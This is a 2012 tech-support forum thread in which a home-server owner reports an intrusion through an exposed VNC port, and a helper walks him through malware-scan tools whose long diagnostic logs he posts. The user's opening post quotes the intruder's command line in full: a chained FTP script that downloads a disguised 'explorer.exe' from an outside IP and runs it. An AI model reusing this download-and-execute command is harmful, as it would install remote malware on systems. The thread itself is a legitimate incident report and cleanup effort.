Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Computer Hijacked


  • Please log in to reply
12 replies to this topic

#1 Novicode

Novicode

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 31 October 2012 - 05:44 PM

Ok, I run a 24/7 Minecraft server (and a few other servers) on my old dell I refer to as "the server" and connect to it using VNC. After leaving for dinner (It took 41 minutes) I came back and took a look at the other monitor with the server pc on it. There was a command prompt window open which said this

"Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>del eq&echo open 190.37.236.107 7836 >> eq&echo user 21313 2
3121 >> eq &echo get explorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &explorer
.exe &del eq
Could Not Find C:\WINDOWS\system32\eq
ftp> open 190.37.236.107 7836
Connected to 190.37.236.107.
220 StnyFtpd 0wns j0
ftp> user 21313 23121
331 Password required
230 User logged in.
ftp> get explorer.exe
200 PORT command successful.
150 Opening BINARY mode data connection"

This alarmed me and after doing some research I found that someone was trying to hijack the computer. By the time I got back, nothing was happening though. I traced it back to me being an idiot and opening the VNC server ports wide open the internet without any encryption so my friend could connect. At that point I remember thinking "Eh, why bother closing ports. Who would find my pc anyways?", I now see I was wrong, VERY wrong. When I opened start and clicked "Run" to open a cmd window, the hijacker had typed this in "%systemroot%\system32\cmd.exe". I'm guessing he opened Command Prompt that way and accessed FTP whatever through that.

I have now closed all ports to my computer and encrypted VNC. All connections also have to be made through password protected hamachi, and all connections need to be approved. But, I'm still wondering what he did, what damage has been done, and how can I fix it?

Any help would be greatly appreciated, Thank you.

Edited by hamluis, 31 October 2012 - 07:19 PM.
Moved from XP to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 06 November 2012 - 05:58 PM

Hello,

I will be helping you with your problems. Please be patient while I assist you.

Some points for you to keep in mind while I am helping you to make things go easier and faster for both of us

  • Please do NOT run, install or uninstall any programs, unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.

NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and click on Proceed. This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planed. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

----------------------------------------------

Please do the following:

:step1:

Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!
  • Double-click on TDSSKiller.exe on your desktop to run the tool for known TDSS variants.
    Vista/Windows 7 users right-click and select Run As Administrator.
  • If TDSSKiller does not run, try renaming it.
  • To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the file extension.
  • Click on change parameters
  • Under Objects to scan, check the box next to Loaded modules
  • If you are asked to reboot, then click Yes.

Next

  • Check the boxes next to Loaded modules, Verify file digital signatures, Detect TDLFS file system, then click OK.
  • Click the Start Scan button.
  • Do not use the computer during the scan
  • If the scan completes with nothing found, click Close to exit.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
  • Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
    Note: If Cure is not an option, Skip instead, do NOT choose Delete or Quarantine unless instructed.
  • A log file named TDSSKiller_version_date_time_log.txt (i.e. TDSSKiller.2.4.0.0_27.07.2010_09.o7.26_log.txt) will be created and saved to the root directory (usually Local Disk C:).
  • Copy and paste the full contents of that file in your next reply. - If the log is too long, then split it into multiple posts.


:step2:

Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the full contents of that document.


:step3:

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center/Action Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press Scan.
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the full contents of the log in your next reply.


:step4:

Please download MiniToolBox, save it to your desktop and run it.

Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices (Only Problems)
  • List Users, Partitions and Memory size.
  • List Minidump Files
  • List Restore points
NOTE: When using "Reset FF Proxy Settings" option Firefox should be closed.

Click Go and post the full contents of the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog


#3 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 06 November 2012 - 07:11 PM

TDSS Log:

18:40:36.0875 5156 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
18:40:37.0375 5156 ============================================================
18:40:37.0375 5156 Current date / time: 2012/11/06 18:40:37.0375
18:40:37.0375 5156 SystemInfo:
18:40:37.0375 5156
18:40:37.0375 5156 OS Version: 5.1.2600 ServicePack: 3.0
18:40:37.0375 5156 Product type: Workstation
18:40:37.0375 5156 ComputerName: SERVER
18:40:37.0375 5156 UserName: Joe
18:40:37.0375 5156 Windows directory: C:\WINDOWS
18:40:37.0375 5156 System windows directory: C:\WINDOWS
18:40:37.0375 5156 Processor architecture: Intel x86
18:40:37.0375 5156 Number of processors: 1
18:40:37.0375 5156 Page size: 0x1000
18:40:37.0375 5156 Boot type: Normal boot
18:40:37.0375 5156 ============================================================
18:40:43.0609 5156 Drive \Device\Harddisk0\DR0 - Size: 0x12A05F2000 (74.51 Gb), SectorSize: 0x200, Cylinders: 0x25FE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054
18:40:43.0671 5156 ============================================================
18:40:43.0671 5156 \Device\Harddisk0\DR0:
18:40:43.0765 5156 MBR partitions:
18:40:43.0765 5156 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x139C5, BlocksNum 0x8EE9870
18:40:43.0765 5156 ============================================================
18:40:43.0953 5156 C: <-> \Device\Harddisk0\DR0\Partition1
18:40:44.0000 5156 ============================================================
18:40:44.0000 5156 Initialize success
18:40:44.0000 5156 ============================================================
18:41:12.0171 2196 Deinitialize success

Security Check:


Results of screen317's Security Check version 0.99.54
Windows XP Service Pack 3 x86
Internet Explorer 6 Out of date!
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
AVG 2013
`````````Anti-malware/Other Utilities Check:`````````
JavaFX 2.1.1
Java™ 6 Update 31
Java™ 7 Update 5
Java 2 Runtime Environment, SE v1.4.2_03
Java version out of Date!
````````Process Check: objlist.exe by Laurent````````
AVG avgwdsvc.exe
AVG avgrsx.exe
AVG avgemc.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:: 33% Defragment your hard drive soon! (Do NOT defrag if SSD!)
````````````````````End of Log``````````````````````

Farbar Service Scanner:


Farbar Service Scanner Version: 07-11-2012
Ran by Joe (administrator) on 06-11-2012 at 19:05:16
Running from "C:\Documents and Settings\All Users\Desktop"
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo IP is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Disabled Policy:
========================

MiniToolBox:


MiniToolBox by Farbar Version: 07-11-2012
Ran by Joe (administrator) on 06-11-2012 at 19:09:59
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================


127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost

========================= IP Configuration: ================================

Intel® PRO/100 VE Network Connection = Local Area Connection (Connected)
Hamachi Network Interface = Hamachi (Connected)


# ----------------------------------
# Interface IP Configuration
# ----------------------------------
pushd interface ip


# Interface IP Configuration for "Hamachi"

set address name="Hamachi" source=dhcp
set dns name="Hamachi" source=dhcp register=NONE
set wins name="Hamachi" source=dhcp

# Interface IP Configuration for "Local Area Connection"

set address name="Local Area Connection" source=static addr=10.0.0.4 mask=255.255.255.0
set address name="Local Area Connection" gateway=10.0.0.1 gwmetric=0
set dns name="Local Area Connection" source=static addr=8.8.8.8 register=PRIMARY
add dns name="Local Area Connection" addr=8.8.4.4 index=2
set wins name="Local Area Connection" source=static addr=none


popd
# End of interface IP configuration



Windows IP Configuration

Host Name . . . . . . . . . . . . : SERVER
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Hamachi:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Hamachi Network Interface
Physical Address. . . . . . . . . : 7A-79-05-2C-17-75
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : No
IP Address. . . . . . . . . . . . : 5.44.23.117
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . : 5.0.0.1
Lease Obtained. . . . . . . . . . : Tuesday, November 06, 2012 6:45:11 PM
Lease Expires . . . . . . . . . . : Wednesday, November 06, 2013 6:45:11 PM

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel® PRO/100 VE Network Connection
Physical Address. . . . . . . . . : 00-13-20-E2-40-C3
Dhcp Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.0.0.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.1
DNS Servers . . . . . . . . . . . : 8.8.8.8
8.8.4.4
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: google.com
Addresses: 74.125.226.233, 74.125.226.228, 74.125.226.226, 74.125.226.238
74.125.226.227, 74.125.226.232, 74.125.226.231, 74.125.226.229, 74.125.226.224
74.125.226.230, 74.125.226.225


Pinging google.com [74.125.226.233] with 32 bytes of data:

Reply from 74.125.226.233: bytes=32 time=49ms TTL=55
Reply from 74.125.226.233: bytes=32 time=49ms TTL=55

Ping statistics for 74.125.226.233:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 49ms, Maximum = 49ms, Average = 49ms
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: yahoo.com
Addresses: 72.30.38.140, 98.138.253.109, 98.139.183.24


Pinging yahoo.com [72.30.38.140] with 32 bytes of data:

Reply from 72.30.38.140: bytes=32 time=238ms TTL=56
Reply from 72.30.38.140: bytes=32 time=143ms TTL=56

Ping statistics for 72.30.38.140:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 143ms, Maximum = 238ms, Average = 190ms
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: bleepingcomputer.com
Address: 208.43.87.2


Pinging bleepingcomputer.com [208.43.87.2] with 32 bytes of data:

Request timed out.
Request timed out.

Ping statistics for 208.43.87.2:
Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=64
Reply from 127.0.0.1: bytes=32 time<1ms TTL=64

Ping statistics for 127.0.0.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...7a 79 05 2c 17 75 ...... Hamachi Network Interface
0x3 ...00 13 20 e2 40 c3 ...... Intel® PRO/100 VE Network Connection - Packet Scheduler Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.0.0.1 10.0.0.4 20
5.0.0.0 255.0.0.0 5.44.23.117 5.44.23.117 20
5.44.23.117 255.255.255.255 127.0.0.1 127.0.0.1 20
5.255.255.255 255.255.255.255 5.44.23.117 5.44.23.117 20
10.0.0.0 255.255.255.0 10.0.0.4 10.0.0.4 20
10.0.0.4 255.255.255.255 127.0.0.1 127.0.0.1 20
10.255.255.255 255.255.255.255 10.0.0.4 10.0.0.4 20
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 240.0.0.0 5.44.23.117 5.44.23.117 20
224.0.0.0 240.0.0.0 10.0.0.4 10.0.0.4 20
255.255.255.255 255.255.255.255 5.44.23.117 5.44.23.117 1
255.255.255.255 255.255.255.255 10.0.0.4 10.0.0.4 1
Default Gateway: 10.0.0.1
===========================================================================
Persistent Routes:
None
========================= Winsock entries =====================================

Catalog5 01 C:\Windows\System32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 02 C:\Windows\System32\winrnr.dll [16896] (Microsoft Corporation)
Catalog5 03 C:\Windows\System32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 01 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 02 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 03 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 04 C:\Windows\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 05 C:\Windows\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 06 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 07 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 08 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 09 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 10 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 11 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 12 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 13 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 14 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 15 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 16 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 17 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (10/31/2012 04:09:47 PM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/31/2012 07:37:56 AM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/31/2012 01:01:38 AM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 10:54:43 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3


System errors:
=============
Error: (11/06/2012 06:43:45 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
IntelIde

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5


Microsoft Office Sessions:
=========================
Error: (10/31/2012 04:09:47 PM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/31/2012 07:37:56 AM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/31/2012 01:01:38 AM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 10:54:43 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3


=========================== Installed Programs ============================

Adobe Flash Player 11 ActiveX (Version: 11.1.102.63)
Advanced SystemCare 4 (Version: 4.2.0)
AiO_Scan (Version: 47.0.1.000)
AiOSoftware (Version: 47.0.1.000)
AOLIcon (Version: 1.00.0000)
AVG 2013 (Version: 13.0.2617)
AVG 2013 (Version: 13.0.2742)
AVG 2013 (Version: 2013.0.2742)
BufferChm (Version: 45.4.157.000)
Conexant D850 56K V.9x DFVc Modem
Copy (Version: 45.4.157.000)
CP_AtenaShokunin1Config (Version: 45.4.131.000)
cp_dwShrek2Albums1 (Version: 45.4.157.000)
cp_dwShrek2Cards1 (Version: 45.4.157.000)
CreativeProjects (Version: 45.4.157.000)
CreativeProjectsTemplates (Version: 45.4.157.000)
CueTour (Version: 45.4.157.000)
Dell Driver Reset Tool (Version: 1.02.0000)
Destinations (Version: 45.4.157.000)
Director (Version: 45.4.157.000)
DocProc (Version: 4.5.0.0)
DocumentViewer (Version: 45.4.157.000)
Easy Macro Recorder 4.4
Fax (Version: 47.0.1.000)
Google Chrome (Version: 22.0.1229.94)
HP Product Assistant (Version: 2.0.0.0)
HPSystemDiagnostics (Version: 1.6.0.0)
InstantShare (Version: 45.4.157.000)
Intel® Extreme Graphics 2 Driver (Version: 6.14.10.4299)
Intel® PRO Network Adapters and Drivers
Intel® PROSet for Wired Connections (Version: 8.00.5000)
Internet Explorer Default Page (Version: 1.00.03)
Java 2 Runtime Environment, SE v1.4.2_03 (Version: 1.4.2_03)
Java Auto Updater (Version: 2.1.6.0)
Java™ 6 Update 31 (Version: 6.0.310)
Java™ 7 Update 5 (Version: 7.0.50)
JavaFX 2.1.1 (Version: 2.1.1)
LogMeIn Hamachi (Version: 2.1.0.215)
Microsoft .NET Framework 1.1 (Version: 1.1.4322)
Microsoft .NET Framework 1.1 Security Update (KB2656353)
Microsoft .NET Framework 1.1 Security Update (KB2656370)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2 (Version: 2.2.30729)
Microsoft .NET Framework 3.0 Service Pack 2 (Version: 3.2.30729)
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319)
Microsoft Base Smart Card Cryptographic Service Provider Package
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (Version: 9.0.21022)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (Version: 10.0.40219)
Microsoft XNA Framework Redistributable 4.0 (Version: 4.0.20823.0)
MSXML 4.0 SP2 (KB954430) (Version: 4.20.9870.0)
MSXML 4.0 SP2 (KB973688) (Version: 4.20.9876.0)
No-IP DUC (Version: 3.0.4)
PanoStandAlone (Version: 45.4.157.000)
PhotoGallery (Version: 45.4.157.000)
ProductContext (Version: 47.1.14.000)
QFolder (Version: 1.00.0000)
QuickTime
Readme (Version: 47.0.1.000)
Scan (Version: 4.5.0.0)
ScannerCopy (Version: 4.5.0.0)
SkinsHP1 (Version: 45.4.157.000)
Steam (Version: 1.0.0.0)
TeamViewer 7 (Version: 7.0.12799)
Terraria
TrayApp (Version: 45.4.157.000)
Unload (Version: 4.5.0)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (Version: 1)
Update for Windows XP (KB2345886) (Version: 1)
Update for Windows XP (KB2492386) (Version: 1)
Update for Windows XP (KB2641690) (Version: 1)
Update for Windows XP (KB2661254-v2) (Version: 2)
Update for Windows XP (KB2718704) (Version: 1)
Update for Windows XP (KB2736233) (Version: 1)
Update for Windows XP (KB2749655) (Version: 1)
Update for Windows XP (KB951978) (Version: 1)
Update for Windows XP (KB955759) (Version: 1)
Update for Windows XP (KB955839) (Version: 1)
Update for Windows XP (KB967715) (Version: 1)
Update for Windows XP (KB968389) (Version: 1)
Update for Windows XP (KB971029) (Version: 1)
Update for Windows XP (KB971737) (Version: 1)
Update for Windows XP (KB973687) (Version: 1)
Update for Windows XP (KB973815) (Version: 1)
Update for Windows XP (KB976749) (Version: 1)
VNC Free Edition 4.1.3 (Version: 4.1.3)
WebFldrs XP (Version: 9.50.7523)
WebReg (Version: 45.4.157.000)
Windows Genuine Advantage Validation Tool (KB892130)
Windows Genuine Advantage Validation Tool (KB892130) (Version: 1.7.0069.2)
Windows Management Framework Core
Windows Media Format Runtime
Windows Media Player 10
Windows Media Player 10 (Version: 9.00.3636)
Windows XP Service Pack 3 (Version: 20080414.031525)

========================= Devices: ================================


========================= Memory info: ===================================

Percentage of memory in use: 49%
Total physical RAM: 509.98 MB
Available physical RAM: 259.62 MB
Total Pagefile: 4075.43 MB
Available Pagefile: 3786.16 MB
Total Virtual: 2047.88 MB
Available Virtual: 1980.96 MB

========================= Partitions: =====================================

1 Drive c: () (Fixed) (Total:71.46 GB) (Free:44.04 GB) NTFS
2 Drive d: (DBAN) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS

========================= Users: ========================================

User accounts for \\SERVER

Administrator ASPNET Guest
HelpAssistant Joe SUPPORT_388945a0

========================= Minidump Files ==================================

No minidump file found

========================= Restore Points ==================================

09-08-2012 20:41:14 System Checkpoint
10-08-2012 12:08:20 Installed Box Sync
11-08-2012 07:00:20 Software Distribution Service 3.0
11-08-2012 07:35:10 Printer Driver Microsoft XPS Document Writer Installed
12-08-2012 07:00:20 Software Distribution Service 3.0
13-08-2012 07:56:24 System Checkpoint
14-08-2012 08:05:24 System Checkpoint
15-08-2012 09:05:25 System Checkpoint
16-08-2012 07:00:16 Software Distribution Service 3.0
17-08-2012 07:26:41 System Checkpoint
18-08-2012 08:26:38 System Checkpoint
19-08-2012 09:26:38 System Checkpoint
20-08-2012 10:26:38 System Checkpoint
21-08-2012 11:26:38 System Checkpoint
22-08-2012 12:26:40 System Checkpoint
23-08-2012 13:26:38 System Checkpoint
24-08-2012 04:36:59 Installed Box Sync
25-08-2012 05:26:28 System Checkpoint
26-08-2012 06:26:27 System Checkpoint
27-08-2012 07:26:28 System Checkpoint
28-08-2012 08:26:28 System Checkpoint
29-08-2012 09:26:29 System Checkpoint
30-08-2012 10:26:31 System Checkpoint
31-08-2012 11:26:16 System Checkpoint
01-09-2012 12:26:15 System Checkpoint
02-09-2012 13:26:18 System Checkpoint
03-09-2012 14:26:16 System Checkpoint
04-09-2012 14:38:45 System Checkpoint
05-09-2012 15:26:15 System Checkpoint
06-09-2012 16:26:15 System Checkpoint
07-09-2012 17:38:35 System Checkpoint
09-09-2012 21:13:31 System Checkpoint
10-09-2012 21:29:09 System Checkpoint
11-09-2012 21:40:26 System Checkpoint
12-09-2012 22:25:12 System Checkpoint
13-09-2012 07:00:19 Software Distribution Service 3.0
14-09-2012 07:25:12 System Checkpoint
15-09-2012 08:25:12 System Checkpoint
16-09-2012 09:25:12 System Checkpoint
17-09-2012 10:25:13 System Checkpoint
18-09-2012 11:25:13 System Checkpoint
19-09-2012 12:25:13 System Checkpoint
20-09-2012 13:25:16 System Checkpoint
21-09-2012 14:25:13 System Checkpoint
22-09-2012 15:25:12 System Checkpoint
23-09-2012 07:00:24 Software Distribution Service 3.0
24-09-2012 07:22:30 System Checkpoint
25-09-2012 08:22:29 System Checkpoint
26-09-2012 09:22:30 System Checkpoint
27-09-2012 10:22:27 System Checkpoint
28-09-2012 11:22:30 System Checkpoint
29-09-2012 12:22:26 System Checkpoint
30-09-2012 13:22:12 System Checkpoint
01-10-2012 14:22:08 System Checkpoint
02-10-2012 14:35:29 System Checkpoint
03-10-2012 15:22:11 System Checkpoint
04-10-2012 16:22:10 System Checkpoint
05-10-2012 17:22:08 System Checkpoint
06-10-2012 18:22:11 System Checkpoint
07-10-2012 19:21:56 System Checkpoint
08-10-2012 20:21:58 System Checkpoint
09-10-2012 21:22:06 System Checkpoint
10-10-2012 07:00:23 Software Distribution Service 3.0
11-10-2012 07:27:09 System Checkpoint
12-10-2012 08:39:37 System Checkpoint
13-10-2012 09:27:09 System Checkpoint
13-10-2012 14:57:01 Removed LogMeIn
13-10-2012 15:01:31 Removed Box Sync
13-10-2012 15:02:47 Removed Adobe Reader 6.0.1
13-10-2012 15:03:58 Removed Google Drive
13-10-2012 16:24:40 Installed AVG 2013
13-10-2012 16:25:38 Installed AVG 2013
13-10-2012 18:20:38 Installed Windows Media Format SDK KB902344.
13-10-2012 18:22:22 Installed %1 %2.
13-10-2012 18:25:15 Installed %1 %2.
13-10-2012 18:41:15 Installed Windows XP KB2492386.
14-10-2012 19:18:46 System Checkpoint
15-10-2012 20:18:45 System Checkpoint
16-10-2012 21:18:48 System Checkpoint
17-10-2012 22:18:56 System Checkpoint
18-10-2012 23:18:52 System Checkpoint
19-10-2012 23:44:17 System Checkpoint
21-10-2012 00:18:51 System Checkpoint
22-10-2012 01:18:25 System Checkpoint
23-10-2012 02:18:25 System Checkpoint
24-10-2012 03:18:25 System Checkpoint
25-10-2012 04:18:27 System Checkpoint
26-10-2012 05:18:27 System Checkpoint
27-10-2012 06:18:30 System Checkpoint
28-10-2012 07:18:26 System Checkpoint
29-10-2012 08:18:17 System Checkpoint
30-10-2012 14:17:14 System Checkpoint
31-10-2012 19:53:57 System Checkpoint
01-11-2012 20:44:12 System Checkpoint
02-11-2012 21:11:06 System Checkpoint
03-11-2012 21:44:11 System Checkpoint
